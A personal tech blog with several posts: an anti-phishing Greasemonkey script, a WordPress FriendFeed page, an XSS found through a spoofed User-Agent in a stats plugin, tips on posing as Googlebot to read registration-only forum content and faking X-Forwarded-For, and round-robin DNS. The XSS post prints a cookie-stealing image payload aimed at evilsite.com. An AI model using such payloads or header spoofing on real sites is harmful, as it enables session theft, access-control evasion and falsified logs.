Aug 03

Recently, there has been too much action when it comes to email accounts. A couple of friends complained that they lost their logins all of a sudden. One friend from college complained that his girl's email account was compromised. They believe that some hacker in Brazil opened his terminal and typed ./hack user@gmail.com to hack them. A few really think it is as simple as opening Microsoft Word and writing "Access Granted" in green to hack.

I want to tell them one thing. These days, most email services are fairly secure (*cough* *cough* not talking about Rediff, which added SSL login a month ago, or Indiatimes, which used to save the password in a cookie as plain text). I'm talking about services like Gmail or Yahoo. But we need to accept the fact that even though we are intelligent and have some protection on our computers, like antivirus and firewalls for Windows folks, or, as my friend Hari says, install Linux, or as Ashok suggests, OS X ... we are busy most of the time. Sometimes we don't use our brain while doing small things.

You would be talking to your friend on the mobile phone and checking Orkut for new scraps. The guy on the phone might be telling you about his new project or something like that and you are involved in the chat. There could be a scrap from a girl ... Karteek, greeting card for you !!! As usual, we click on the link, it tells you that you need to login to view the card, and you just login while talking on the phone.

[Recap]

What happened ? -> You clicked on the link

After that ? -> It asked you to login

Then ? -> You logged in

Then ? -> It might tell you to login again as your password is wrong

After that ??? -> You logged in or it logged you in automatically or you just left it

Now, the analysis part. Well, nothing big happened. You were just phished. You tried to login to a service on a fake login screen. You might lose many things through that username and password (your email might contain a lot of info).

Now, coming to the important part: how to escape from it? Well, be careful is my answer. But I know that I told you that we might just get carried away sometimes. For that, I coded a small Greasemonkey script which will protect you from low-level phishing attacks. Yes, only low-level. If the hacker is intelligent, he can game it easily, but most of the time intelligent hackers have much more useful things to do than hacking you. So, don't worry much about it.

The script is well commented. It doesn't do wonders but serves the purpose. Feel free to edit it, make it more useful and share it with others. I don't care about licenses, so I don't mind even if you tell your girlfriend that you coded it to protect her from being phished ;)

Very important. Never ever install a Greasemonkey script unless you have read it and are damn sure that it's secure. Anyway, you can find the script here.

Update: Code made a little more logical. Now it won't annoy much. And by default, I made it support Google, Yahoo, Hotmail and WordPress. Adding other services is very easy.
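The core check such a script needs, as an added example (this is not the author's script): warn when a page asks for a password but its hostname is not one of the expected login hosts or a subdomain of one. The allowlist, the use of the URL API and the HTTPS check are my assumptions, not details from the post.

```javascript
// Added example, not the author's Greasemonkey script. A page that asks for a
// password is only "expected" when its hostname is a known login host or a
// subdomain of one. Plain substring matching is the classic mistake:
// "google.com.evil.example" contains "google.com" but is not Google.

// Hosts the services named in the post log in on (constructed allowlist;
// real login hosts change, so treat this as an assumption to maintain).
const TRUSTED_LOGIN_HOSTS = [
  'google.com', 'yahoo.com', 'live.com', 'hotmail.com', 'wordpress.com',
];

// True when host equals a trusted host or is a subdomain of it.
// Comparison is case-insensitive and a trailing dot (FQDN form) is ignored.
function isTrustedHost(host, trusted = TRUSTED_LOGIN_HOSTS) {
  const h = host.toLowerCase().replace(/\.$/, '');
  return trusted.some((t) => h === t || h.endsWith('.' + t));
}

// Decide whether to warn: a password field on an untrusted host, or any
// password field served over plain http. Returns null when there is
// nothing to warn about, otherwise the warning text.
function phishingWarning(url, hasPasswordField) {
  if (!hasPasswordField) return null;
  const { hostname, protocol } = new URL(url);
  if (!isTrustedHost(hostname)) {
    return `Login form on unexpected site: ${hostname}`;
  }
  if (protocol !== 'https:') {
    return `Login form on ${hostname} is not using HTTPS`;
  }
  return null;
}

// Userscript entry point: only runs inside a browser, where document exists.
if (typeof document !== 'undefined') {
  const hasPw = document.querySelector('input[type="password"]') !== null;
  const msg = phishingWarning(location.href, hasPw);
  if (msg) alert('Phishing check: ' + msg);
}
```

A greeting-card page hosted anywhere outside the allowlist that shows a password field trips the first branch; a look-alike such as accounts.google.com.evil.example is rejected by the suffix check rather than matched as Google.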

Mar 28

FriendFeed is one great service which I've been using for a few days/weeks. So I thought I would publish my FriendFeed on this blog. Well, as usual, I have some requirements of my own. The requirement is that I don't want to show it in my sidebar; I want to dedicate a page to it. So I need to take JSON/XML/RSS/Atom from FriendFeed and create HTML out of it. Obviously, I have to either write JS to parse it client side or a PHP script to parse it server side. PHP was my choice and I needed an option to exec PHP on a single page. There was one plugin named phpexec, but I wasn't very comfortable (call it being paranoid) using that plugin.

So, I used a small workaround. I created a page feed.php and added

/*
Template Name: My Friendfeed
*/

Now my WordPress thinks that it's a template and gives me an option of choosing the template while creating pages. I created a page but without any content. I wrote all my PHP logic in feed.php and now WordPress parses the template and gives me the required output. Anyway, you can download the code here. You have to extract the contents to your theme folder. Btw, you can see it working here.

Well, it's a hack job. It works (only) for me. If you want to do the same, you have to edit the code according to your needs. It could have been done far more easily, but my stupid host has PHP4 and I missed many features. And I had something else in mind (I thought of publishing the FriendFeed I follow, i.e., all friends' feeds) but later changed my mind. By the way, if you don't know what FriendFeed is, in a small definition it is an aggregator of all the 2.0ish services you might be using. Check it out if you want to know more, you won't be disappointed.

PS: There is absolutely no reason why I haven't blogged for more than a month. I wasn't busy. It's just that nothing happened in my life to blog about. Absolutely nothing. Uhmm, wait, I've been to Coorg on an adventure trip. Nothing more than that.

Nov 18

Well, it's not just a funny way, but a very funny way. Neither through an HTTP GET nor an HTTP POST, but through a header. I hadn't read about this method of XSS up to now, but seriously, it's silly and common. Usually webmasters read about the traffic of their websites, and Referer and User-Agent are very common headers they analyze to know the type of visitors and from which site they are coming.

I just spoofed my User-Agent header to "<script>alert(1)</script>", and when I saw the stats page after that, guess what, my stats plugin wasn't sanitizing the input, and I got the alert window.

Now, going back to fix and report it. Take care when looking at your stats (especially in WordPress). Rather than keeping an alert, one can keep something like this

<img
src="javascript:document.images[1].src=%22http://evilsite.com/cookie.php?c%3D+document.cookie;"
style=visibility:hidden />

The above code will send the cookie to the cookie.php page of evilsite.com, and the hacker can collect the cookies there using very simple code and he can become you just by using those cookies. This page has many vectors to use. It doesn't teach you how to use them, so if you really know what you have to do, you must know this page already.

Result: check your stats plugins and make sure that they are sanitizing all the inputs. Just don't trust them. They can be very dangerous. Finishing yet another episode of "How do THEY do it?"
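What "sanitizing all the inputs" means for a stats page, as an added example (not the author's plugin or any real WordPress stats plugin): the raw-concatenation rendering that executes a header value, next to a version that escapes every value and refuses to turn a non-http(s) referer into a link. The sample hits, field names and the use of the URL API are my assumptions.

```javascript
// Added example, not the author's stats plugin. Headers are attacker-controlled
// input like any GET/POST parameter; the only difference is that the victim
// is the site admin reading the stats page.

// Constructed sample hits, as a stats plugin might have logged them.
const HITS = [
  { ip: '203.0.113.5', referer: 'http://example.com/page', ua: 'Mozilla/5.0' },
  { ip: '198.51.100.9', referer: 'javascript:alert(document.cookie)',
    ua: '<script>alert(1)</script>' },
];

// Vulnerable: raw concatenation, exactly what triggered the alert in the post.
function renderRowVulnerable(hit) {
  return `<tr><td>${hit.ip}</td><td><a href="${hit.referer}">${hit.referer}</a></td>` +
         `<td>${hit.ua}</td></tr>`;
}

// Fix 1: HTML-escape every untrusted value placed into markup (text and
// attribute contexts both covered, since quotes are escaped too).
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

// Fix 2: escaping is not enough for a URL that becomes a link. A referer of
// "javascript:..." survives escaping intact and still runs on click, so only
// http(s) referers become links; anything else is shown as plain text.
function safeHref(url) {
  try {
    const p = new URL(url).protocol;
    return p === 'http:' || p === 'https:' ? url : null;
  } catch (e) {
    return null;   // not a parseable URL at all
  }
}

function renderRowSafe(hit) {
  const ref = escapeHtml(hit.referer);
  const href = safeHref(hit.referer);
  const refCell = href ? `<a href="${escapeHtml(href)}">${ref}</a>` : ref;
  return `<tr><td>${escapeHtml(hit.ip)}</td><td>${refCell}</td>` +
         `<td>${escapeHtml(hit.ua)}</td></tr>`;
}

// Render the whole table; pass renderRowVulnerable to see the unsafe output.
function renderStats(hits, render = renderRowSafe) {
  return `<table>${hits.map(render).join('')}</table>`;
}
```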

Nov 04

A funny feature (or mod) in vBulletin boards, possibly in other message board scripts too. Have you ever faced this kind of situation?

  1. You need to download something
  2. You search in Google and you get some relevant results
  3. You click on that and you go to that site
  4. You see that the content (or the link to the download) which you needed is not shown; instead a message like "This part of the post is available only to registered users" is shown.

I've faced that situation. These days, many message boards are coming up with a feature named "Premium Content" which is available only to registered users. But in order to get traffic from search engines, those coders give an option to let search engines index the premium content. That is the reason why you see a snippet of the content in Google but not when you go to that site.

Here is the tip. Either try to read it in the Google cache or become Google yourself!!! How would you become Google? The answer is simple: spoof your User-Agent to Google's. These boards do nothing more than check your headers.

In Firefox, download an extension like User Agent Switcher or Modify Headers and change your user-agent to "Googlebot/2.1 (+http://www.googlebot.com/bot.html)" and this will make the site think that you are Google.

In Firefox, there is another option. In the address bar type "about:config", create a new string named "general.useragent.override" and set the value to "Googlebot/2.1 (+http://www.googlebot.com/bot.html)". Don't forget, all the values go without quotes. This method broke my Gmail, as it stopped loading JavaScript thinking that I'm really incompatible. So avoid this.

If you use IE, you'd better switch to Firefox for happy browsing. But if you don't want to switch and still want my tip, yeah, open the registry editor and do whatever you want at
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User Agent

After doing this, just check whether your settings are fine or not at UserAgent.org. If you want to try something different, telnet to the host on port 80 and spoof those headers yourself.

Instead of doing all this, you can prove that you are very boring by either registering at that site or checking whether there are any working entries at BugMeNot.com, logging in and reading the required information.

BTW, yet another tip which might be useful. An "X-Forwarded-For" header will make the server think that you are a proxy server for the IP address in the value field of that header. In simple words, an IP address like "72.14.2o7.99" in the "X-Forwarded-For" header might make the server think that you are a proxy for "72.14.2o7.99" and save that IP in the log instead of yours. A stupid site like Rediff will give you its Rediff Abroad page, thinking that it's so intelligent to grab your real location using that header, because 72.14.2o7.99 is an IP address of Google, located in CA, USA.

Have Fun. Happy Spoofing ;)
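The server side of both tricks above, as an added example (not from the post, vBulletin or Rediff): a board that hands out premium content or picks a location from a header alone is trusting the visitor's word. The usual remedies are to confirm a Googlebot claim with a reverse-then-forward DNS check, and to honour X-Forwarded-For only when the direct peer is one of your own proxies. The DNS table, proxy list and lookup functions here are constructed so the example runs offline.

```javascript
// Added example. User-Agent and X-Forwarded-For cost the client nothing to
// set, so neither proves anything on its own.

// Googlebot verification as search engines document it: reverse-resolve the
// connecting IP, require a googlebot.com/google.com name, then forward-resolve
// that name and require it to map back to the same IP. Lookups are injected
// so the example runs offline; in production they would be real DNS queries.
const GOOGLE_SUFFIXES = ['.googlebot.com', '.google.com'];

function isVerifiedGooglebot(ip, userAgent, reverseLookup, forwardLookup) {
  if (!/Googlebot/.test(userAgent)) return false;   // claim not even made
  const names = reverseLookup(ip) || [];
  return names.some((name) =>
    GOOGLE_SUFFIXES.some((s) => name.toLowerCase().endsWith(s)) &&
    (forwardLookup(name) || []).includes(ip));
}

// Client IP selection: X-Forwarded-For is used only when the direct peer is
// one of our own proxies, and then only the address that proxy appended (the
// right-most one); everything further left was written by the client and is
// exactly the spoofed value the post describes.
function clientIp(remoteAddr, xff, trustedProxies) {
  if (!trustedProxies.includes(remoteAddr) || !xff) return remoteAddr;
  const chain = xff.split(',').map((s) => s.trim()).filter(Boolean);
  return chain.length ? chain[chain.length - 1] : remoteAddr;
}

// Constructed DNS tables (RFC 5737 documentation addresses) for the offline run.
const PTR = {
  '192.0.2.10': ['crawl-192-0-2-10.googlebot.com'],
  '198.51.100.7': ['host7.attacker.example'],
};
const A = {
  'crawl-192-0-2-10.googlebot.com': ['192.0.2.10'],
  'host7.attacker.example': ['198.51.100.7'],
};
const reverseLookup = (ip) => PTR[ip];
const forwardLookup = (name) => A[name];
```

A visitor who only changes the User-Agent string fails the reverse lookup, and a spoofed X-Forwarded-For from a visitor who is not one of the listed proxies is ignored entirely.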

Oct 27

I've spent another Satyam Cinemas ticket on hosting, this time on a host which has older-but-stable versions of software. I've migrated the database to this new one as well.

Guess what, this time I'm trying yet-another-new-thing. Now I have two hosting packages on two different hosts (didn't waste much money, total cost is three tickets at Satyam Cinemas). My DNS management is done for free by ZoneEdit and it supports round-robin DNS (a technique that enables a domain to be hosted on multiple servers, and to have the load balanced between them). So I configured both servers to host my blog and one of them will be pointed to by ZoneEdit's DNS servers when you request.

Reasons for this action:

  • I have no clue why I did this :)
  • Let me see if I learn something new, as I got so many new doubts right now while doing it
  • The first host is bad, I don't know about the second host. At least one of them will be up to serve the blog :P

I have no clue about the following questions:

  • How am I going to synchronize posts at both the servers?
  • Will the DNS server point you to the second server automatically when the first server is down?
  • What exactly will be happening in the background at the DNS server and my browser when I request a page?

I'm sure that I'll get more doubts and I'm even more sure that I'm going to find answers to these questions. If you have answers to my questions, please let me know; otherwise, I will let you guys know when I find solutions :)
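What plain round-robin DNS does and does not do, as an added simulation (not ZoneEdit's resolver or this blog's actual setup): each answer lists every A record, rotated by one per query, so visitors spread over the hosts; the resolver never checks whether a host is up, so a dead host keeps being handed out, and reaching the other one depends on the client trying the next address in the answer. The zone, addresses and injected `connect` function are constructed.

```javascript
// Added example. Constructed zone: the blog on two hosts
// (RFC 5737 documentation addresses stand in for the real ones).
const ZONE = { 'blog.example': ['192.0.2.1', '198.51.100.1'] };

// Rotating resolver: returns the full record set, with the start position
// advancing by one on every query, which is the usual round-robin behaviour.
// Note there is no health check anywhere in here.
function makeResolver(zone) {
  const pos = {};
  return (name) => {
    const rrset = zone[name];
    if (!rrset) return [];
    const i = pos[name] || 0;
    pos[name] = (i + 1) % rrset.length;
    return rrset.slice(i).concat(rrset.slice(0, i));
  };
}

// Client: try each returned address in order until one accepts the
// connection. `connect(ip)` is injected (returns true when the host is up)
// so the run is offline. Reports which host served and what was tried.
function fetchBlog(resolve, connect, name = 'blog.example') {
  const tried = [];
  for (const ip of resolve(name)) {
    tried.push(ip);
    if (connect(ip)) return { servedBy: ip, tried };
  }
  return { servedBy: null, tried };   // both hosts down: DNS cannot help
}
```

With the first host down, the first visitor's answer still leads with it; the visitor reaches the blog only because the client falls through to the second address.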